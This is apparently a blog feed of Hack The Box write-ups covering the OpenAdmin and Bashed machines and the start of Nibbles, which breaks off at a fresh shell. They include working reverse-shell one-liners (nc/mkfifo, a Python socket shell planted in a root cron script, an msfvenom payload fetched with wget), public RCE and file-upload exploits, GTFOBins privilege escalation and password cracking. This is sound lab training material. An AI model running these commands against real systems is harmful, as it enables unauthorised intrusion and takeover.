v0.4.3\n (_||| _) (/_(_|| (_| )\n\nExtensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460\n\nOutput File: /home/kali/htb/OpenAdmin/reports/http_openadmin.htb/_25-01-13_17-16-56.txt\n\nTarget: http://openadmin.htb/\n\n[17:16:57] Starting: \n[17:16:58] 403 -  278B  - /.ht_wsr.txt\n[17:16:58] 403 -  278B  - /.htaccess.bak1\n[17:16:58] 403 -  278B  - /.htaccess.orig\n[17:16:58] 403 -  278B  - /.htaccess.save\n[17:16:58] 403 -  278B  - /.htaccess.sample\n[17:16:58] 403 -  278B  - /.htaccess_extra\n[17:16:58] 403 -  278B  - /.htaccess_sc\n[17:16:58] 403 -  278B  - /.htaccessBAK\n[17:16:58] 403 -  278B  - /.htaccess_orig\n[17:16:58] 403 -  278B  - /.htaccessOLD\n[17:16:58] 403 -  278B  - /.htaccessOLD2\n[17:16:58] 403 -  278B  - /.htm\n[17:16:58] 403 -  278B  - /.html\n[17:16:58] 403 -  278B  - /.htpasswd_test\n[17:16:58] 403 -  278B  - /.htpasswds\n[17:16:58] 403 -  278B  - /.httr-oauth\n[17:16:59] 403 -  278B  - /.php\n[17:17:24] 301 -  314B  - /music  ->  http://openadmin.htb/music/\n[17:17:26] 301 -  312B  - /ona  ->  http://openadmin.htb/ona/    <--------------------------\n[17:17:32] 403 -  278B  - /server-status\n[17:17:32] 403 -  278B  - /server-status/\n\nTask Completed\nona - Open Net Admin\nhttp://openadmin.htb/ona/\n\"You are NOT on the latest release version. Your version = v18.1.1\"\n$ searchsploit open net admin\n--------------------------------------------------------------------- ---------------------------------\n Exploit Title                                                       |  Path\n--------------------------------------------------------------------- ---------------------------------\nOpenNetAdmin 13.03.01 - Remote Code Execution                        | php/webapps/26682.txt\nOpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)         | php/webapps/47772.rb\nOpenNetAdmin 18.1.1 - Remote Code Execution                          | php/webapps/47691.sh\nSCO OpenServer 5.0.6 - lpadmin Buffer Overflow                       | sco/dos/20735.txt\n--------------------------------------------------------------------- ---------------------------------\nShellcodes: No Results\nHere is a working Python exploit found on GitHub: https://github.com/amriunix/ona-rce\npython3 ona_exploit.py exploit http://openadmin.htb/ona\n...\nsh$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.2 1337 >/tmp/f\n---------------------------------------------------\n$ nc -lnvp 1337\nlistening on [any] 1337 ...\nconnect to [10.10.14.42] from (UNKNOWN) [10.10.10.171] 45688\nsh: 0: can't access tty; job control turned off\n$ python3 -c \"import pty;pty.spawn('/bin/bash')\"\nwww-data@openadmin:/opt/ona/www$ export TERM=xterm\nexport TERM=xterm\nwww-data@openadmin:/opt/ona/www$ ^Z\nzsh: suspended  nc -lnvp 1337\n\n┌──(kali㉿kali)-[~/htb/OpenAdmin]\n└─$ stty raw -echo; fg\n[1]  + continued  nc -lnvp 1337\n\nwww-data@openadmin:/opt/ona/www$ whoami\nwww-data\nmysql\nwww-data@openadmin:/opt/ona/www$ grep -ri \"passwd\"\nplugins/ona_nmap_scans/install.php:    mysql -u {$self['db_login']} -p{$self['db_passwd']} {$self['db_database']} < {$sqlfile}</font><br><br>\ninclude/functions_db.inc.php:    $ona_contexts[$context_name]['databases']['0']['db_passwd'] = $db_context[$type] [$context_name] ['primary'] ['db_passwd'];\ninclude/functions_db.inc.php:    
$ona_contexts[$context_name]['databases']['1']['db_passwd'] = $db_context[$type] [$context_name] ['secondary'] ['db_passwd'];\ninclude/functions_db.inc.php:    $ok1 = $object->PConnect($self['db_host'], $self['db_login'], $db['db_passwd'], $self['db_database']);\n.htaccess.example:# You will need to create an .htpasswd file that conforms to the standard\n.htaccess.example:# htaccess format, read the man page for htpasswd.  Change the\n.htaccess.example:# AuthUserFile option below as needed to reference your .htpasswd file.\n.htaccess.example:# names, however, do need to be the same in both the .htpasswd and web\n.htaccess.example:    #AuthUserFile /opt/ona/www/.htpasswd\n===========================\nlocal/config/database_settings.inc.php:        'db_passwd' => 'n1nj4W4rri0R!',\n===========================\nwinc/user_edit.inc.php:    name=\"passwd\"\nwinc/user_edit.inc.php:    if (!$form['id'] and !$form['passwd']) {\nwinc/user_edit.inc.php:        if ($form['passwd']) {\nwinc/user_edit.inc.php:            $form['passwd'] = md5($form['passwd']);\nwinc/user_edit.inc.php:            'passwd' => $form['passwd'],\nwinc/user_edit.inc.php:        if (strlen($form['passwd']) < 32) {\nwinc/user_edit.inc.php:            $form['passwd'] = $record['passwd'];\nwinc/user_edit.inc.php:            'passwd' => $form['passwd'],\nwinc/tooltips.inc.php:// Builds HTML for changing tacacs enable passwd\n\n$ cat database_settings.inc.php\n<?php\n$ona_contexts=array (\n  'DEFAULT' =>\n  array (\n    'databases' =>\n    array (\n      0 =>\n      array (\n        'db_type' => 'mysqli',\n        'db_host' => 'localhost',\n        'db_login' => 'ona_sys',\n        'db_passwd' => 'n1nj4W4rri0R!',\n        'db_database' => 'ona_default',\n        'db_debug' => false,\n      ),\n    ),\n    'description' => 'Default data context',\n    'context_color' => '#D3DBFF',\n  ),\n);\nWe find nothing interesting in the MySQL database; however, the password works to log in as the user jimmy:\njimmy:n1nj4W4rri0R!\nwww-data@openadmin:/opt/ona/www$ su jimmy\nPassword: \njimmy@openadmin:/opt/ona/www$ whoami\njimmy\nWe can also connect over SSH:\n$ ssh jimmy@openadmin.htb\nThe authenticity of host 'openadmin.htb (10.10.10.171)' can't be established.\nED25519 key fingerprint is SHA256:wrS/uECrHJqacx68XwnuvI9W+bbKl+rKdSh799gacqo.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes/no/[fingerprint])? yes\nWarning: Permanently added 'openadmin.htb' (ED25519) to the list of known hosts.\njimmy@openadmin.htb's password: \nLast login: Thu Jan  2 20:50:03 2020 from 10.10.14.3\njimmy@openadmin:~$ whoami\njimmy\njimmy -> joanna\ninternal : apache service\nWe find an \"internal\" folder containing PHP code that points to another Apache server. 
It is a login page with a user \"jimmy\" and the hash of his password:\n╔══════════╣ My user\n╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users\nuid=1000(jimmy) gid=1000(jimmy) groups=1000(jimmy),1002(internal)\nindex.php:\nif (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {\n    if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {\n        $_SESSION['username'] = 'jimmy';\n        header(\"Location: /main.php\");\n    } else {\n        $msg = 'Wrong username or password.';\n    }\n}\n?>\nOn CrackStation, we find the password for the hash: 'Revealed'.\nWe observe that if we log in with jimmy:Revealed, we land on the main page, which appears to display the SSH key of the user \"joanna\".\nmain.php:\njimmy@openadmin:/var/www/internal$ cat main.php\n<?php session_start(); if (!isset ($_SESSION['username'])) { header(\"Location: /index.php\"); };\n## Open Admin Trusted\n## OpenAdmin\n$output = shell_exec('cat /home/joanna/.ssh/id_rsa');\necho \"<pre>$output</pre>\";\n?>\n<html>\n<h3>Don't forget your \"ninja\" password</h3>\nClick here to logout <a href=\"logout.php\" tite = \"Logout\">Session\n</html>\nWe see the configuration of this second Apache server:\njimmy@openadmin:/tmp$ cat /etc/apache2/sites-enabled/internal.conf\nListen 127.0.0.1:52846\n\n<VirtualHost 127.0.0.1:52846>\n    ServerName internal.openadmin.htb\n    DocumentRoot /var/www/internal\n\n<IfModule mpm_itk_module>\nAssignUserID joanna joanna\n</IfModule>\n\n    ErrorLog ${APACHE_LOG_DIR}/error.log\n    CustomLog ${APACHE_LOG_DIR}/access.log combined\n\n</VirtualHost>\nSo it runs on port 52846. 
We can also confirm that this port is open with the \"ss\" command:\n$ ss -nlta\nState      Recv-Q Send-Q Local Address:Port          Peer Address:Port\nLISTEN     0      128    127.0.0.53%lo:53            0.0.0.0:*\nLISTEN     0      128    0.0.0.0:22                  0.0.0.0:*\nLISTEN     0      80     127.0.0.1:3306              0.0.0.0:*\nLISTEN     0      128    127.0.0.1:52846             0.0.0.0:*\nCLOSE-WAIT 0      0      10.10.10.171:35776          10.10.16.2:1337\nCLOSE-WAIT 0      0      10.10.10.171:36134          10.10.16.2:1337\nSYN-SENT   0      1      10.10.10.171:55916          1.1.1.1:53\nESTAB      0      36     10.10.10.171:22             10.10.16.2:36932\nCLOSE-WAIT 0      0      10.10.10.171:35848          10.10.16.2:1337\nESTAB      0      0      10.10.10.171:22             10.10.16.2:44542\nESTAB      0      0      10.10.10.171:36824          10.10.16.2:1337\nLISTEN     0      128    [::]:22                     [::]:*\nLISTEN     0      128    *:80                        *:*\nCLOSE-WAIT 1      0      [::ffff:10.10.10.171]:80    [::ffff:10.10.16.2]:58916\nCLOSE-WAIT 1      0      [::ffff:10.10.10.171]:80    [::ffff:10.10.16.2]:49868\nCLOSE-WAIT 1      0      [::ffff:10.10.10.171]:80    [::ffff:10.10.16.2]:37876\nCLOSE-WAIT 1      0      [::ffff:10.10.10.171]:80    [::ffff:10.10.16.2]:38320\nTo reach this Apache server, we need to forward port 52846 to our machine. This is very easy to do with \"chisel\" for port forwarding:\njimmy@openadmin:/tmp$ ./chiselserver_linux client 10.10.16.2:8081 R:52846:127.0.0.1:52846\n2025/01/20 10:10:38 client: Connecting to ws://10.10.16.2:8080\n2025/01/20 10:10:38 client: Connected (Latency 34.737115ms)\n----------------------------------------------------\n$ ./chiselserver_linux server -p 8081 --reverse\n2025/01/20 05:09:33 server: Reverse tunnelling enabled\n2025/01/20 05:09:33 server: Fingerprint 1ytgJA0Yrt37Nd/YOVUXpE2VjZp29m7JvW5jTyjZ9D4=\n2025/01/20 05:09:33 server: Listening on http://0.0.0.0:8080\n2025/01/20 05:10:03 server: session#1: tun: proxy#R:52846=>52846: Listening\nFrom our Kali machine, we open the page and (after logging in as jimmy:Revealed) we get: http://localhost:52846/main.php\n-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D\n\nkG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8\nad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO\nShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE\n6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ\nZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du\ny8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI\n9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4\npiC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/\n/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH\n40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ\nfnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb\n9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80\nX1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg\nS33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F\nFnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh\nTh5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa\nRTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z\nuhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr\n1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2\nXGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79\nyPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM\n+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt\nqlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt\nz0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe\nK1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN\n-----END RSA PRIVATE KEY-----\n\nDon't forget your \"ninja\" password\nClick here to logout Session\nWe can modify the main.php file as jimmy to open a reverse shell as the user joanna:\n## We use a \"php-reverse-shell.php\" script to open a reverse shell.\n## We put it in the internal folder, then run it from the browser:\n## http://localhost:52846/php-reverse-shell.php\n...\n// Usage\n// -----\n// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.\n\nset_time_limit (0);\n$VERSION = \"1.0\";\n$ip = '10.10.16.2';  // CHANGE THIS\n$port = 1338;       // CHANGE THIS\n$chunk_size = 1400;\n$write_a = null;\n$error_a = null;\n$shell = 'uname -a; w; id; /bin/sh -i';\n$daemon = 0;\n$debug = 0;\n\n//\n// Daemonise ourself if possible to avoid zombies later\n//\n...\n--------------------------------------\n┌──(kali㉿kali)-[~/htb/OpenAdmin]\n└─$ nc -lnvp 1338\nlistening on [any] 1338 ... 
connect to [10.10.16.2] from (UNKNOWN) [10.10.10.171] 60408\nLinux openadmin 4.15.0-70-generic #79-Ubuntu SMP Tue Nov 12 10:36:11 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux\n 10:51:59 up 6 min,  1 user,  load average: 0.00, 0.10, 0.07\nUSER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT\njimmy    pts/0    10.10.16.2       10:48   15.00s  0.08s  0.07s -bash\nuid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal)\n/bin/sh: 0: can't access tty; job control turned off\n$ python3 -c \"import pty;pty.spawn('/bin/bash')\"\njoanna@openadmin:/$ export TERM=xterm\nexport TERM=xterm\njoanna@openadmin:/$ ^Z\nzsh: suspended  nc -lnvp 1338\n\n┌──(kali㉿kali)-[~/htb/OpenAdmin]\n└─$ stty raw -echo; fg\n[1]  + continued  nc -lnvp 1338\n\njoanna@openadmin:/$ \njoanna@openadmin:/$ whoami\njoanna\njoanna@openadmin:/$ cd /home/joanna/\njoanna@openadmin:/home/joanna$ ls\nuser.txt\njoanna@openadmin:/home/joanna$ cat user.txt\n11dc.....75aa\nSSH : joanna\n┌──(kali㉿kali)-[~/htb/OpenAdmin]\n└─$ ssh-keygen -t rsa -b 2048 -f joanna_key\nGenerating public/private rsa key pair.\nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in joanna_key\nYour public key has been saved in joanna_key.pub\nThe key fingerprint is:\nSHA256:w3+Bf3zBE44h5De2+Y3MmwMIZVTWG2HoIJYslnAWVDU kali@kali\nThe key's randomart image is:\n+---[RSA 2048]----+\n| .o==.+Eoooo. |\n| o+ = *o..o |\n| . o + = = + |\n| .. .= X .|\n| S....+ = |\n| o...=..+|\n| . o.*.o|\n| . ..+ |\n| o. |\n+----[SHA256]-----+\n\n┌──(kali㉿kali)-[~/htb/OpenAdmin]\n└─$ cat joanna_key.pub\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDS5cj9VZMFNS/Ga0vlT44cnx1HTDMQo3WpDw94nizBdQBMKYk5XmaKFMZdKxeGKNIEERpbKGObTXwbDix9JYY9aA1M4/l/tOSY97w3kMXlRrwJppGIedXyDmAsPjIjQUpFQ00ZPEClME0OQXDzQHxDtkFm6kvefiiI5jLt0+aqvWqkPjbpOlBnm60PuxYsSrPLIUjvw6JUt/ckece553L+BPzwO6HfLuk3wH6i9CGocS90CIu1M00vrkTi3CJVTcCowx8u81bQmM3b/NMksEDC38Xf4gL1ZA4QI5zVqIptxQPuOkBJWFmgkPrzE6Fniod0VGHIn/WMBdJAc/XAhpu/ kali@kali\n\n┌──(kali㉿kali)-[~/htb/OpenAdmin]\n└─$ ssh -i joanna_key joanna@openadmin.htb\nWelcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)\n\n * Documentation:  https://help.ubuntu.com\n * Management:     https://landscape.canonical.com\n * Support:        https://ubuntu.com/advantage\n\n  System information as of Mon Jan 20 10:59:11 UTC 2025\n\n  System load:  0.0               Processes:             178\n  Usage of /:   31.1% of 7.81GB   Users logged in:       1\n  Memory usage: 9%                IP address for ens160: 10.10.10.171\n  Swap usage:   0%\n\n * Canonical Livepatch is available for installation.\n   - Reduce system reboots and improve kernel security. Activate at:\n     https://ubuntu.com/livepatch\n\n39 packages can be updated.\n11 updates are security updates.\n\nFailed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings\n\nLast login: Tue Jul 27 06:12:07 2021 from 10.10.14.15\njoanna@openadmin:~$ \nWe add the public key to joanna's authorized_keys, and we can SSH in without any trouble...\njoanna -> root\nEnumeration\njoanna@openadmin:~$ sudo -l\nMatching Defaults entries for joanna on openadmin:\n    env_keep+=\"LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET\", env_keep+=\"XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH\", secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin, mail_badpass\n\nUser joanna may run the following commands on openadmin:\n    (ALL) NOPASSWD: /bin/nano /opt/priv\nnano as root\nhttps://gtfobins.github.io/gtfobins/nano/\nOn GTFOBins, we look up how to escalate privileges with nano. We find the following command:\nnano\n^R^X\nreset; sh 1>&0 2>&0\nWe then get a shell as root:\n## whoami\nroot\n## cd /root\n## cat root.txt\n????????????? 
BONUS: ssh2john and john to crack joanna's passphrase\n┌──(kali㉿kali)-[~/htb/OpenAdmin]\n└─$ ssh2john old_joanna.pem\nold_joanna.pem:$sshng$1$16$2AF25344B8391A25A9B318F3FD767D6D$1200$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\n\n┌──(kali㉿kali)-[~/htb/OpenAdmin]\n└─$ echo 'old_joanna.pem:$sshng$1$16$2AF2......................1a484d62d602903793d10d' > hash.txt\n\n┌──(kali㉿kali)-[~/htb/OpenAdmin]\n└─$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt\nUsing default input encoding: UTF-8\nLoaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])\nCost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes\nCost 2 (iteration count) is 1 for all loaded hashes\nWill run 2 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nbloodninjas      (old_joanna.pem)     <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\n1g 0:00:00:04 DONE (2025-01-20 08:36) 0.2212g/s 2118Kp/s 2118Kc/s 2118KC/s bloodninjas..bloodmore23\nUse the \"--show\" option to display all of the cracked passwords reliably\n## We find JOANNA's passphrase: bloodninjas ","date":"2025-01-20T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/openadmin-htb/","title":"HTB | OpenAdmin"},{"content":" Machine name: Bashed | OS: Linux | IP: 10.10.10.68 | Difficulty: Easy\nEnumeration\nnmap\n┌──(kali㉿kali)-[~]\n└─$ nmap -sS -sC -sV -An -p- 10.10.10.68\n...\n80 -> HTTP : http://bashed.htb\nFoothold\ngobuster: found dev/ folder\n$ gobuster dir -u http://bashed.htb -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http://bashed.htb\n[+] Method:                  GET\n[+] Threads:                 50\n[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster/3.6\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n/uploads              (Status: 301) [Size: 310] [--> http://bashed.htb/uploads/]\n/php                  (Status: 301) [Size: 306] [--> http://bashed.htb/php/]\n/css                  (Status: 301) [Size: 306] [--> http://bashed.htb/css/]\n/dev                  (Status: 301) [Size: 306] [--> http://bashed.htb/dev/]\n/js                   (Status: 301) [Size: 305] [--> http://bashed.htb/js/]\n/fonts                (Status: 301) [Size: 308] [--> http://bashed.htb/fonts/]\n/images               (Status: 301) [Size: 309] [--> http://bashed.htb/images/]\n/server-status        (Status: 403) [Size: 298]\nProgress: 220560 / 220561 (100.00%)\n===============================================================\nFinished\n===============================================================\nphpbash.php: www-data and arrexel user\nIn the dev/ folder, we can run a phpbash.php script that literally gives an interactive bash session as www-data on the machine:\nhttp://bashed.htb/dev/phpbash.php\n\nwww-data@bashed:/# cd home/\nwww-data@bashed:/home# ls\narrexel\nscriptmanager\nwww-data@bashed:/home# cd arrexel\nwww-data@bashed:/home/arrexel# ls\nuser.txt\nwww-data@bashed:/home/arrexel# cat user.txt\naef2.....8071\nUsers\ncat /etc/passwd | grep bash\nroot:x:0:0:root:/root:/bin/bash\narrexel:x:1000:1000:arrexel,,,:/home/arrexel:/bin/bash\nscriptmanager:x:1001:1001:,,,:/home/scriptmanager:/bin/bash\nReverse shell : msfvenom\nWith msfvenom, for practice:\n$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.42 LPORT=1337 -f elf -o test.elf\n[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload\n[-] No arch selected, selecting arch: x64 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 74 bytes\nFinal size of elf file: 194 bytes\nSaved as: test.elf\n\n$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...\n10.10.10.68 - - [11/Jan/2025 19:11:27] \"GET /test.elf HTTP/1.1\" 200 -\n------------------------------------------\n$ nc -lnvp 1337\nlistening on [any] 1337 ...\nconnect to [10.10.14.42] from (UNKNOWN) [10.10.10.68] 54598\npython3 -c \"import pty;pty.spawn('/bin/bash')\"\nwww-data@bashed:/tmp$ export TERM=xterm\nexport TERM=xterm\nwww-data@bashed:/tmp$ ^Z\nzsh: suspended  nc -lnvp 1337\n\n┌──(kali㉿kali)-[~/htb/Bashed]\n└─$ stty raw -echo; fg\n[3]    continued  nc -lnvp 1337\n\nwww-data@bashed:/tmp$ whoami\nwww-data\n---------------------------------------------\nwget 10.10.14.42:8888/test.elf\n--2025-01-11 16:18:10--  http://10.10.14.42:8888/test.elf\nConnecting to 10.10.14.42:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 194 [application/octet-stream]\nSaving to: 'test.elf'\n\n     0K                                                       100% 40.5M=0s\n\n2025-01-11 16:18:10 (40.5 MB/s) - 'test.elf' saved [194/194]\n\nwww-data@bashed:/tmp# chmod 777 ./test.elf\nwww-data@bashed:/tmp# ls -la test.elf\n-rwxrwxrwx 1 www-data www-data 194 Jan 11 16:10 test.elf\nwww-data@bashed:/tmp# ./test.elf &\nwww-data -> scriptmanager\nEnumeration : sudo -l\nWe discover that we can run any command as the user scriptmanager without a password!\nwww-data@bashed:/home/arrexel$ sudo -l\nMatching Defaults entries for www-data on bashed:\n    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin\n\nUser www-data may run the following commands on bashed:\n    (scriptmanager : scriptmanager) NOPASSWD: ALL\nshell as scriptmanager\nSo we open a bash as scriptmanager:\nwww-data@bashed:/home/arrexel$ sudo -u scriptmanager /bin/bash\nscriptmanager@bashed:/home/arrexel$ whoami\nscriptmanager\nscriptmanager -> root\nLinPEAS : /scripts folder\nWith LinPEAS, we discover a suspicious \"/scripts\" folder at the root of the filesystem, created by the user scriptmanager.\nWe find that it contains two files:\nscriptmanager@bashed:/scripts$ ls -l\ntotal XX\n-rw-r--r-- 1 scriptmanager scriptmanager 206 Jan 12 14:37 test.py\n-rw-r--r-- 1 root          root           12 Jan 12 13:25 test.txt\nIn test.py, we can see a command that writes the string \"hello\" to a file test.txt. That file already exists, so the script has been run before. Since the file appears to have been created by root, we deduce that root ran this Python script. We therefore assume this file is probably a test script run regularly by root from a crontab. 
So we modify the test.py file with a reverse shell taken from the Reverse Shell Generator site: https://www.revshells.com/\nimport socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.42\",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"sh\")\n-----------------------------\nnc -lnvp 6666\nlistening on [any] 6666 ...\nconnect to [10.10.14.42] from (UNKNOWN) [10.10.10.68] 42276\n## whoami\nwhoami\nroot\n## cat /root/root.txt\ncat /root/root.txt\n4600.....78e4 ","date":"2025-01-13T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/bashed-htb/","title":"HTB | Bashed"},{"content":" Machine name: Nibbles | OS: Linux | IP: 10.10.10.75 | Difficulty: Easy\nEnumeration\nnmap\n┌──(kali㉿kali)-[~]\n└─$ nmap -sS -sC -sV -An -p- -vvv 10.10.10.75\nPORT   STATE SERVICE REASON         VERSION\n22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH\n|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc=\n|   256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk\n80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))\n|_http-title: Site doesn't have a 
title (text/html).\n|_http-server-header: Apache/2.4.18 (Ubuntu)\n| http-methods: \n|_  Supported Methods: OPTIONS GET HEAD POST\nFoothold\nnibbleblog\nWith gobuster, we find no interesting folder on the web server. However, with Burp we find a comment indicating the existence of a \"nibbleblog\" folder:\nHTTP/1.1 200 OK\nDate: Sun, 12 Jan 2025 23:30:36 GMT\nServer: Apache/2.4.18 (Ubuntu)\nLast-Modified: Thu, 28 Dec 2017 20:19:50 GMT\nETag: \"5d-5616c3cf7fa77-gzip\"\nAccept-Ranges: bytes\nVary: Accept-Encoding\nContent-Length: 93\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\nContent-Type: text/html\n\n<b>Hello world!</b>\n\n<!-- /nibbleblog/ directory. Nothing interesting here! -->\nadmin.php\nLooking around a bit, we find a login page, \"admin.php\". With the creds found on the internet we have: user: admin, password: nibbles\nWe get to the nibbles dashboard.\nArbitrary File Upload - user flag\nOn the internet, we find a vulnerability in nibbleblog:\nNibbleblog 4.0.3 - Arbitrary File Upload (CVE-2015-6967)\npython3 exploit.py --url http://nibbles.htb/nibbleblog/ -u admin -p nibbles -x shell.php\n[+] Login Successful.\n[+] Upload likely successfull.\n[+] Exploit launched, check for shell.\n-----------------------------------------------------------\n$ nc -lnvp 1337\nlistening on [any] 1337 ...\nconnect to [10.10.14.42] from (UNKNOWN) [10.10.10.75] 34102\nLinux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux\n 04:01:44 up  9:25,  0 users,  load average: 0.00, 0.00, 0.00\nUSER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT\nuid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)\n/bin/sh: 0: can't access tty; job control turned off\n$ 